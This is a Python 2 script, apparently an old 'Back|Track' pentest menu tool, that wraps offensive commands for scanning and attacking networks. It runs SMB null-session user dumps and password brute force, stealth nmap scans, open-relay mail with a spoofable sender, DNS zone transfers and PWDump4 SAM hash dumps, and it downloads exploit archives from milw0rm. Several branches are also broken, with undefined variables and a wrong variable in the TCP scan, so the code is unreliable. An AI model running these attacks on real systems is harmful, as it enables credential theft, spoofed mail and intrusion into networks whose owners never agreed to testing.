#! /usr/bin/python # Back|Track V2.0 Attack Module # Created by: ReL1K # # Remember to chmod 755 btupdate.py # import os import smtplib import time import dns.zone import dns.query import dns.resolver import sys from dns.rdatatype import * from dns.rdataclass import * from dns.exception import DNSException print """ Back|Track v2.0 Final Toolset Written by: ReL1K """ # Main Menu to choose while 1==1 : mainmenu=raw_input("""Back|Track Main Menu: 1. Back|Track Updates 2. External Attack and Penetration 3. Internal Attack and Penetration 4. Wireless Assessment 5. Fuzzers 6. Exit Enter the number: """) # End Main Menu # End loop with option 5 if mainmenu == ('6'): print """ **** QUITTING **** """ break # End loop # Start BackTrack Updates if mainmenu == ('1'): while 1==1 : blah=raw_input("""Enter a number to update 1. Metasploit 2 2. Metasploit 3 3. Aircrack-NG 4. Kismet 5. Milw0rm 6. Install Aircrack-PTW 7. Return to Main Menu Enter number: """) if blah == '1': print """ **** Updating Metasploit v2 **** """ a=os.system("svn update /pentest/exploits/framework2/") print a if blah == '2': print """ **** Updating Metasploit v3 **** """ b=os.system("svn update /pentest/exploits/framework3/") print b if blah == '3': print """ **** Updating AirCrack-NG **** """ c=os.system("svn co http://trac.aircrack-ng.org/svn/trunk/ /pentest/wireless/aircrack-ng;cd /pentest/wireless/aircrack-ng;make clean && make && make install") print c if blah == '4': print """ **** Updating Kismet **** """ d=os.system("svn co http://svn.kismetwireless.net/code/trunk /pentest/wireless/kismet;cd /pentest/wireless/kismet;./configure && make clean && make && make install") print d if blah == '5': print """ **** Updating Milw0rm **** """ e=os.system("cd /pentest/exploits;wget http://www.milw0rm.com/sploits/milw0rm.tar.bz2;tar jxpf milw0rm.tar.bz2;rm milw0rm.tar.bz2;cd milw0rm;./makeindex-milw0rm &&") print e if blah == '6': print """ **** Adding AirCrack-PTW to Back|Track **** """ f=os.system("cd /pentest/wireless;wget http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/download/aircrack-ptw-1.0.0.tar.gz;tar -zxvf aircrack-ptw-1.0.0.tar.gz;cd aircrack-ptw-1.0.0;gcc -o aircrack-ptw -Wall -fomit-frame-pointer -O3 -lpcap aircrack-ptw.c aircrack-ptw-lib.c -lpcap ;cp aircrack-ptw /usr/local/bin;rm /pentest/wireless/aircrack-ptw-1.0.0.tar.gz;chmod 755 /usr/local/bin/aircrack-ptw") print f if blah == '7': print """ **** Exiting Menu **** """ break # End Back|Track Updates # Start External Attack and Penetration if mainmenu == '2': while 1==1: menu = raw_input("""Lets do this: 1. Enumeration 2. Port Scanning 3. Mail Relay 4. Zone Transfer 5. Exploitation 6. SQL Injection spawn XP_Cmdshell 7. Return to Previous Menu Enter a number: """) if menu == '3' : # Mail Relay Written by ReL1K ab1 = raw_input ("Enter From: ") ab2 = raw_input ("Enter To: ") ab5 = time.ctime(time.time()) ab3 = raw_input ("Enter Subject: ") ab4 = raw_input ("Enter Message: ") ab6 = ('From: %s\nTo: %s\nDate: %s\nSubject: %s\n%s\n' % (ab1,ab2,ab5,ab3,ab4)) server= raw_input("Enter servername: ") print "Sending the mail now..." mailsend= smtplib.SMTP('%s' % (server)) code = mailsend.sendmail(ab1, ab2, ab6) s.quit() if code: print "Didn't send successfully" else: print "It worked!" # End Mail Relay # Starting Zone Transfer # By ReL1K if menu == '4': domain = raw_input ("Enter domain name: ") print ("Looking up NS for domain %s" % (domain)) resolve = dns.resolver.query(domain, 'NS') ns= [] for rdata in resolve: n = str(rdata) print "Name server found:", n ns.append for n in ns: print "Attempting a zone transfer..." try: zonetransfer = dns.zone.from_xfr(dns.query.xfr(n, domain)) print "\nPrinting results..." for name, node in zone.nodes.items(): rdataset = node.rdatasets for record in rdataset: print >> logfile, 'name, record' except DNSException, e: print e.___class___, e #End Zone Transfer # start option 7 menu if menu == '7' : print """ ***** Returning to Previous Menu ***** """ break # End option 7 exit # Start Internal Attack and Penetration Option 3 if mainmenu == '3' : while 1==1: intmenu=raw_input("""What doya wanta do: 1. Null Session User Dump and Brute Force (lowercase, upper, and blank) 2. Blank SQL Ping and Auto Spawn XP_Cmdshell 3. Port Scanning 4. Dump SAM 5. Prep your box for this menu 6. Go Back a previous menu Enter a number: """) # Start Option 1 SMB Brute Force if intmenu == '1': input1=raw_input("Enter the IP address: ") smb=os.system("/pentest/enumeration/smb-enum/smbdumpusers -i %s -v -r /root/internalap/%sdumpusers.txt" % (input1,input1)) print smb smbbf=os.system("/pentest/enumeration/smb-enum/smbbf -i %s -p /root/internalap/smbpasslist.txt -u /root/internalap/%sdumpusers.txt -r /root/internalap/%ssmbsuccess.txt -v" % (input1,input1,input1)) print smbbf print """ When completed, your results will be in /root/internalap/smbsuccess.txt """ # Option 1 SMB Brute Force END # Option 3 Port Scanning if intmenu == '3': portmenu=raw_input("""What type of scan: 1. Stealth SYN 2. Stealth TCP Choose a number: """) # Chose 1 Syn Scan if portmenu == '1': synip=raw_input("Enter the IP: ") syn=os.system("nmap -sS -O -v -P0 %s > /root/internalap/%sportscan.txt" % (synip,synip)) print syn print "*** Results will be printed in /pentest/internalap under portscan.txt ***" # Chose 2 TCP Scan if portmenu == '2': tcpip=raw_input("Enter the IP: ") tcp=os.system("nmap -sT -O -v -P0 %s > /root/internalap/%sportscan.txt" % (synip,synip)) print tcp print "*** Results will be printed in /root/internalap under portscan.txt ***" # End Port Scan # Start SAM SUMP if intmenu == '4': ipdump=raw_input("Enter the IP of server: ") ipuser=raw_input("Enter the Username (example domain\user): ") sam=os.system("/pentest/windows-binaries/passwd-attack/wine PWDump4.exe %s /u: %s /o: /root/internalap/%ssamdump.txt" % (ipdump,ipuser,ipdump)) print sam # End SAM DUMP # Option 5 Start PREP if intmenu == '5': print """ ****** Prepping your Box ****** """ c=os.system("rm -rf /root/internalap") a=os.system("mkdir /root/internalap") b=os.system('echo -e "\nlc %username%\nuc %username%" > /root/internalap/smbpasslist.txt') print c print a print b print """ ****** Your results will be piped to /root/internalap ****** """ # Option 5 Prep END # Option 6 Previous Menu if intmenu == '6': print """ ****** Returning to previous menu ****** """ break # End Option 6 Previous Menu # Starting Main Menu 6 Fuzzers